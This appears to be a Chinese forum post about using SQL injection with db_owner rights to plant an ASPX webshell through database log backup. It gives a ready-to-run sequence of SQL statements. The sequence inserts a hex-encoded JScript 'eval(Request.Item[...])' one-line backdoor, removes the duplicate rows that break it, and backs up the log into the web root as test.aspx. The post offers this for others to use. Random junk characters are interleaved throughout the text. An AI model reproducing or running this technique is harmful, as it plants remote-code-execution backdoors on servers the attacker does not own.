最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
( \% W f% G1 p但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
8 J2 d; o- A Z9 @' u7 R( Q经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。# R) @# s! P0 B# B: r
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。2 ?% q3 N8 D9 f' w7 Z% R" D: M1 Z
( a$ }3 ^6 y4 ]8 g' Z
--------------------------------------------------------------
6 {' r+ Y _/ _, u( n* j今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
8 b& b% @8 Q- `/ g6 b0 l: L; ^4 d自己修改备份语句如下:$ r T6 c8 t0 ~5 R9 \3 e9 \0 g5 Z
Drop table cmd;-- C* ^' b7 K& f" r0 Y
alter database db_test set RECOVERY FULL;--/ z' a) D6 Y+ Q7 A* ~) I
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
0 X5 Z: p# ~& ebackup log db_test to disk = 'c:\bak' with init;--/ s. N4 L* L! R- [8 `
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--0 a, g% s5 _1 I6 q3 c
delete from cmd where id>1;--删除id>1的数据
. B( x$ x4 c7 H% @0 a0 {+ ^; ?backup log db_test to disk = 'e:\webroot\test.aspx';--) U" o4 k% O* _- F
Drop table cmd;--
$ e% c8 U9 e9 q- v; T希望对大家有用。 |